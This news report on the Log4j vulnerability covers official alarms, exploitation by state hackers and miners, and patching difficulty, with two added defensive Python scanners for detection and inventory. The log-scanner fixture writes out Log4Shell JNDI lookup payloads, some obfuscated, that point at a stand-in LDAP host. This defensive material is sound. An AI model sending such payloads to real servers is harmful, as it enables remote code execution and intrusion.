BOSTON — Security pros say it’s one of the worst computer vulnerabilities they’ve ever seen. It is already being exploited by state-backed hackers from Iran and China, as well as rogue cryptocurrency miners.
The Department of Homeland Security is sounding a dire alarm, ordering federal agencies to urgently eliminate the bug because it’s so easily exploitable, and telling those with public-facing networks to put up firewalls if they can’t be sure. The affected software is small and often undocumented.
Detected in a widely used utility called Log4j, the flaw lets internet-based attackers easily seize control of everything from industrial control systems to web servers and consumer electronics. Simply identifying which systems use the utility is a major challenge: it is often hidden under layers of other software.
The top U.S. cybersecurity defense official, Jen Easterly, deemed the flaw “one of the most serious I’ve seen in my entire career, if not the most serious” in a call Monday with state and local officials and partners in the private sector. Publicly disclosed last Thursday, it’s catnip for cybercriminals and digital spies because it allows easy, password-free entry.
CISA, the Cybersecurity and Infrastructure Security Agency Easterly oversees, created a resource page Tuesday to help address a vulnerability it believes is present on hundreds of millions of devices. Germany activated its national IT crisis center, and other countries with high levels of computerization were also taking the issue seriously.
Dragos, an industrial control cybersecurity company, said crucial industries including transportation, electric power, water and food were exposed. “I think we won’t see a single major software vendor in the world — at least on the industrial side — not have a problem with this,” said Sergio Caltagirone, the company’s vice president of threat intelligence.
Eric Goldstein, who heads CISA’s cybersecurity division, said Washington was leading a global response. He said no federal agency was known to have been compromised, but stressed that these are very early days.
“What we have here is an extremely widespread, easy to exploit and potentially highly damaging vulnerability that certainly could be utilized by adversaries to cause real harm,” he said.
Small code, big impact
The Java-based software logs users’ activity. It was developed and is maintained by a handful of volunteers under the auspices of the open-source Apache Software Foundation, and it is extremely popular with commercial software developers. It runs across many platforms (Windows, Linux, Apple’s macOS), powering everything from web cams to car navigation systems and medical devices, according to the security firm Bitdefender.
Goldstein told reporters on Tuesday night’s conference call that CISA would update an inventory of patched software as fixes become available. Log4j is often embedded in third-party programs, which must be updated by their owners. “We expect remediation will take some time,” he said.
The Apache Software Foundation said Alibaba, the Chinese tech giant, notified it of the flaw on Nov. 24, 2021. It took two weeks to develop and release a fix.
Beyond patching to fix the flaw, computer security pros have an even more daunting challenge: trying to detect whether the vulnerability was exploited — whether a network or device was hacked. This will require weeks of monitoring. A frantic weekend of trying to identify — and slam shut — open doors before hackers exploited them now shifts to a marathon.
Lull before the storm
“A lot of people are already pretty stressed out and pretty tired from working through the weekend — when we are really going to be dealing with this for the foreseeable future, pretty well into 2022,” said Joe Slowik, threat intelligence lead at the network security firm Gigamon.
Check Point, a cybersecurity company, said Tuesday that it had detected over half a million malicious attempts to find the flaw in corporate networks around the world. It said the flaw was exploited to plant cryptocurrency mining malware — which uses computer cycles to mine digital money surreptitiously — in five countries.
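The scanning attempts Check Point counted, and the exploitation checks described earlier, mostly come down to searching request logs for the Log4j lookup string attackers send. The following is an added example, not code from the article or from any vendor it quotes. It assumes Apache combined-format access logs and the well-known obfuscations of the `${jndi:` trigger (nested `${lower:…}`, `${upper:…}` and `${…:-x}` lookups, plus percent-encoding); the five log lines are constructed for the example, using RFC 5737 documentation addresses.

```python
import re
from urllib.parse import unquote

# Innermost Log4j lookups used to disguise the trigger string, e.g.
# ${lower:J} -> J, ${upper:n} -> n, ${::-d} -> d, ${env:NOPE:-i} -> i.
# They contain no nested "${", so repeated substitution unwraps from the inside out.
_INNER_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"      # ${lower:x} / ${upper:x} -> x
    r"|\$\{[^${}]*:-([^${}]*)\}",           # ${anything:-default}   -> default
    re.IGNORECASE,
)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def normalize(text, max_rounds=20):
    """Percent-decode once, then unwrap simple lookup obfuscation until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if new == text:
            break
        text = new
    return text.lower()

def scan_lines(lines):
    """Return (line_number, normalized_line) for each line carrying a ${jndi: lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits

# Constructed sample log (not real traffic): one benign request, then four probes
# using the plain trigger, nested lower: lookups, percent-encoding, and :- defaults.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/b}"',
    '203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%3A1389%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.14 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.5:1389/d}"',
]

if __name__ == "__main__":
    for n, norm in scan_lines(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

A hit in the web server log only proves a probe arrived; whether the lookup was evaluated depends on whether that field reached a vulnerable Log4j call, so outbound LDAP/RMI connections from the host around the same timestamp are the corroborating signal. The normalizer handles only one layer of percent-encoding and the common lookup tricks, which is why the search is worth repeating against application logs where the decoded value was actually written.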
No ransomware exploiting the flaw has been found. But experts say that’s probably just a matter of time.
“I think what’s going to happen is it’s going to take two weeks before the effect of this is seen because hackers got into organizations and will be figuring out what to do to next,” said John Graham-Cumming, chief technical officer of Cloudflare, whose online infrastructure protects websites from online threats.
We’re in a lull before the storm, said senior researcher Sean Gallagher of the cybersecurity firm Sophos.
“We expect adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on.” That would include extracting usernames and passwords.
John Hultquist of the cybersecurity firm Mandiant said a Chinese state-backed hacker group, as well as Iranian hackers, had already exploited the flaw for cyberespionage, and that other state actors were expected to follow suit. He would not name the target of the Chinese hackers or its geographical location. He said the Iranian actors are “particularly aggressive” and had taken part in ransomware attacks primarily for disruptive ends.
Insecure software design
The Log4j episode exposes a poorly addressed issue in software design, experts say. Too many programs used in crucial functions have not been developed with enough care for security.
Slowik of Gigamon said open-source developers such as the volunteers responsible for Log4j are not to blame.
Popular and custom-made applications often lack a “Software Bill of Materials” that lets users know what’s under the hood — a crucial need at times like this.
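When no bill of materials exists, the practical fallback for the “what’s under the hood” question raised above, and for the earlier point that Log4j is usually buried inside third-party software, is to walk the deployed artifacts themselves. The scanner below is an added example, not code from the article, CISA or Apache. It assumes the layout of published log4j-core jars, where the class that performs JNDI lookups lives at `org/apache/logging/log4j/core/lookup/JndiLookup.class` and the Maven `pom.properties` carries the version, and it recurses into jars nested inside wars and ears. The sample deployment tree it builds is constructed for the example; which reported versions are vulnerable must be taken from Apache’s advisory, which the article does not reproduce.

```python
import io
import os
import sys
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

def inspect_archive(data, path):
    """Report log4j-core inside one archive (given as bytes), recursing into nested archives."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings          # not a zip container; nothing to inspect
    with zf:
        names = set(zf.namelist())
        if JNDI_CLASS in names or POM_PROPS in names:
            version = "unknown"
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            findings.append({
                "path": path,
                "version": version,
                "jndi_lookup_present": JNDI_CLASS in names,  # False if the class was removed as mitigation
            })
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(zf.read(name), f"{path}!{name}"))
    return findings

def scan_tree(root):
    """Walk a directory and inspect every archive found, including nested ones."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                p = os.path.join(dirpath, f)
                with open(p, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), p))
    return findings

def build_sample_tree(root):
    """Constructed fixture: app.war embedding log4j-core-2.14.1.jar, plus an unrelated clean jar."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        z.writestr(POM_PROPS, "version=2.14.1\ngroupId=org.apache.logging.log4j\n")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
        z.writestr("WEB-INF/classes/App.class", b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(os.path.join(root, "clean.jar"), "w") as z:
        z.writestr("com/example/Main.class", b"\xca\xfe\xba\xbe")

def demo():
    """Scan the constructed fixture in a temporary directory and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)

if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for r in results:
        print(f"{r['path']}: log4j-core {r['version']} (JndiLookup present: {r['jndi_lookup_present']})")
```

Run it as `python scan_log4j.py /opt` against a real host, or with no argument to see it find the jar hidden one level down inside the war. It only sees archives on disk: shaded jars that relocate the package, Log4j copied loose into a classpath directory, and code loaded at runtime are all misses, so the output is an inventory aid rather than proof of absence.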
“This is becoming obviously more and more of a problem as software vendors overall are utilizing openly available software,” said Caltagirone of Dragos.
Particularly in industrial systems, he said, analog equipment once used for everything from water utilities to food production has been digitally upgraded over the past decade to allow remote control and automated maintenance. “And one of the ways they did that, obviously, was through software and through the use of programs which utilized Log4j,” Caltagirone said.